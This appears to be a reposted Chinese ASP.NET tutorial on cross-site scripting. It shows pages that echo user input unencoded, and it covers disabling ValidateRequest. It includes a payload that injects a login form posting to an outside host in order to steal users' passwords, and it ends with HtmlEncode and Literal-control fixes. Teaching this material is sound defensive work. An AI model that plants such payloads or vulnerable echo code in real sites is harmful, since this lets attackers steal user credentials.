不要轻信用户提交上来的数据
alert消息太难看,因此开发一个aspx页面用来统一展示消息ShowMessage.ashx

//主页将判断重定向到另一个页面
if (TextBox1.Text != "gao")
{Response.Redirect("sey.aspx?Name=密码不正确!");
}//在ShowMessage.aspx进行验证
Label1.Text = Request["Name"];    //将Name值显示在Label1控件里面

由于现在ASP.NET中以经屏蔽了查询语句里含有脚本,如 Name=<script> 是不行的需要手动关闭该功能,在 网页的 Page 里面设置 ValidateRequest="false" 停用查询语句的验证

利用:
http://127.0.0.1/ShowMessage.aspx?Name="hello" //将会在 Label1 里面显示hello
也可以写入一段代码,如<script type="text/javascript">alert('你好!')</script>
不过一定要加密,只识别加密的 http://www.hao123.com/haoserver/jmjm.htm 这里可加密解密
也可以写入一个表单,如<form action="http://xgao.com/hehe.aspx"> 并且再设置一些文本框
让用户输入账号,密码,这样就可以得到别人的账号密码了!

论坛评论:
如: File.AppendAllText("c:/11.txt",TextBox1.Text); //将用户的文章写入数据库
Response.Write(File.ReadAllText("c:/11.txt")); //将用户的文章显示出来
从上面可以看出,如果用户的文章里含有 <script> 没加密的,显示的时候也可执行

解决:

string s = File.ReadAllText("c:/11.txt");
HttpUtility.HtmlEncode(s);); //将用户的文章转换成html编码,这样就显示的结果就是原文章
HttpUtility.HtmlEncode(s)    //将字符串s中的< > 等特殊字符转换&gt;等成转义符
HttpUtility.HtmlDecode(s)    //再将转换后的转换回来

除了使用HttpUtility.HtmlDecode进行手动编码的话,还可以使用 Literal 控件显示,
需要修改Literal的Mode属性为 Encode 那么就会自动进行 HtmlEncode 然后显示
上面的这两个例子就是 XSS(跨站脚本, Cross-site scripting)

转载于:https://www.cnblogs.com/xgao/p/4173979.html

XSS漏洞(跨站脚本)相关推荐

  1. XSS漏洞(跨站脚本攻击)

    1.原理 ​ 跨站脚本是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种.是由于Web应用程序对用户的输入过滤不足又将输入输出到页面中导致.它允许恶意用户将代码注入网页,其他用户在浏览网页时就 ...

  2. XSS跨站脚本攻击实例讲解,新浪微博XSS漏洞过程分析

    2011年6月28日晚,新浪微博遭遇到XSS蠕虫攻击侵袭,在不到一个小时的时间,超过3万微博用户受到该XSS蠕虫的攻击.此事件给严重依赖社交网络的网友们敲响了警钟.在此之前,国内多家著名的SNS网站和 ...

  3. 跨站脚本攻击之反射型XSS漏洞【转载】

    转载自FovWeb.com 如果一个WEB应用程序使用动态页面传递参数向用户显示错误信息,就有可能会造成一种常见的XSS漏洞.一般情况下,这种页面使用一个包含消息文本的参数,并在页面加载时将文本返回给 ...

  4. java反射行跨站脚本攻击_跨站脚本攻击之反射型XSS漏洞【转载】

    如果一个WEB应用程序使用动态页面传递参数向用户显示错误信息,就有可能会造成一种常见的XSS漏洞.一般情况下,这种页面使用一个包含消息文本的参数,并在页面加载时将文本返回给用户.对于开发者来说,使用这 ...

  5. WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案

    对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...

  6. Web安全之XSS漏洞

    同源策略 同源策略(Same-Origin Policy),就是为了保证互联网之中,各类资源的安全性而诞生的产物,它实际上是一个众多浏览器厂商共同遵守的约定.同源策略是浏览器中最基本的安全功能.缺少同 ...

  7. ASP.Net防范XSS漏洞攻击的利器HtmlSanitizer

    项目名称:HtmlSanitizer NuGet安装指令:Install-Package HtmlSanitizer 官方网站:https://github.com/mganss/HtmlSaniti ...

  8. ecshop pages.lbi.php,关于Ecshop pages.lbi.php Xss漏洞的修复

    前段时间在用ecshop建站的时候,360报警说出现了严重的漏洞:Ecshoppages.lbi.phpXss漏洞==============================我是分割线======== ...

  9. xss植入_网站xss漏洞的利用过程

    XSS跨站脚本,是一种Web安全漏洞,有趣是是他并不像SQL注入等攻击手段攻击服务端,本身对Web服务器没有危害,攻击的对象是客户端,使用浏览器访问这些恶意地址的网民.这里就跟大家稍微讲解一下网站xs ...

  10. php 其他页面获取session_PHP安全:XSS漏洞防御

    一次性付费进群,长期免费索取教程,没有付费教程. 进微信群回复公众号:微信群:QQ群:460500587  教程列表 见微信公众号底部菜单 |  本文底部有推荐书籍  微信公众号:计算机与网络安全 I ...

最新文章

  1. android 时间管理app,时间管理app
  2. java面试题_208道Java面试题,
  3. 每日小记 2017.2.14
  4. linux命令行安装vnc_CentOS下安装VNC并设置远程服务
  5. Windows Server 2016-Windows控制台的新增功能
  6. 计算机专业本科毕业答辩问题及回答
  7. 新visio2019专业版最新功能和激活密钥!
  8. android视图绘制流程,android视图绘制流程完全解析带你一步步深入了解view二.docx...
  9. 【向生活低头】联想云教室同步win10_64位电脑导致的电脑卡死在lenovo界面
  10. mysql中一个字符等于几个字节_细说一个汉字等于几个字符,以及汉字,字符,字节,位之间的关系...
  11. 写给应届毕业生-------五险一金以及个人所得税缴纳计算
  12. 懂生意的产品经理,才能做好商业化
  13. android系统无法识别u盘,OTG无法识别U盘怎么办 OTG无法识别解决方法
  14. mysql 28000 远程_启用远程MySQL连接:错误1045(28000):拒绝用户访问
  15. upset图形如何理解
  16. 股票的大底部形态,常见几种底部形态详解
  17. 出门在外如何保管毕业证原件_出门在外时如何控制HomeKit智能家居
  18. 记录下我磕磕碰碰的三个月找工作经历,不吃透都对不起自己
  19. 计算机中用户必须调入,外存储器中的信息,必须首先调入 ______ ,然后才能供CPU使用。...
  20. 有空赚赚美元! 美国的外包项目交易网站

热门文章

  1. 蒙了吗?offsetLeft、offsetWidth、scrollTop、scrollWidth、event.pageX
  2. 99乘法表的四种位置类型for...in while
  3. 2016年11月5日20:42:09
  4. ios8改变statusBar字体的显示颜色
  5. zookeeper conceptual
  6. Tomcat的BIO、NIO、ARP模式
  7. TIKV扩容之刨坑填坑 ​
  8. 消息中间件的 Style
  9. 有这样的开发,产品经理跪着帮你擦汗!
  10. 通过 sync.Once 学习到 Go 的内存模型